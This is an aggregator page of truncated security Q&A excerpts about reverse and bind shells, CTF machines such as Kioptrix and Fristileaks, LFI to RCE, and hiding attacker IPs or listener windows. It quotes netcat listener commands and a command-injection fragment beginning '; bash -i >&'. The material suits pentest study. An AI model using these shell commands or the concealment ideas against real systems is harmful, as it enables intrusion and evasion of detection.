Collaborate Disseminate
If an attacker successfully installed a backdoor that connects to his computer via a reverse shell, how can the attacker hide his IP address?
I’d guess he can’t use Tor or a VPN, because packet forwarding would be quite impossible (is that… Continue reading Reverse shell from backdoor – exposing attacker? [duplicate]
I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.
Locally over TCP:
Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
Target terminal sends an in… Continue reading Unable to start reverse shell over HTTP
I’m doing a pentest on a FreeBSD machine running CuppaCMS. Already managed to login into the CMS with admin privilege, but it only takes me to a manager menu, with some options to change some tables and stuff like that, no RCE visible esca… Continue reading LFI to RCE through User-Agent
I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.
For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I… Continue reading Help Understanding PHP Reverse Shells
GOALS: run a powershell script without showing the window (it’s ok if it pops up for few seconds).
PROBLEM: the script tcplisten.ps1 works just if the window is displayed to the user. All the attempts below don’t work. Because when I run n… Continue reading How to hide tcp port listener powershell script?
I know that reverse shells get the victim to connect to us, but I heard that people mostly use reverse shells Why use reverse shells when hacking a network outside our local network as we have to do port forwarding? It only brings some ext… Continue reading Why to use Reverse Shell? [duplicate]
I know what a reverse shell does and what a bind shell is but I want to know when pen-testers or hackers use these shells. When reverse shells are useful and when using bind shells will be useful.
Continue reading When to use reverse and bind shells? [duplicate]
Is there any way that i can use the compromised website as the shell
What i am trying to achieve is to get a reverse shell on the machine,not a webshell.The target machine has a website hosted on it open to public.The machine is behind a … Continue reading Php intermediate shell
I’ve completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation.
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
; bash -i >& … Continue reading Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?
So say I ran a python reverse shell script on a victim machine and caught the connection on my machine using netcat -nvlp 4444. What would be the best way to upgrade this shell? Is there a way to import this established connection into met… Continue reading What is the best way to upgrade a netcat low priv shell into a high priv shell [closed]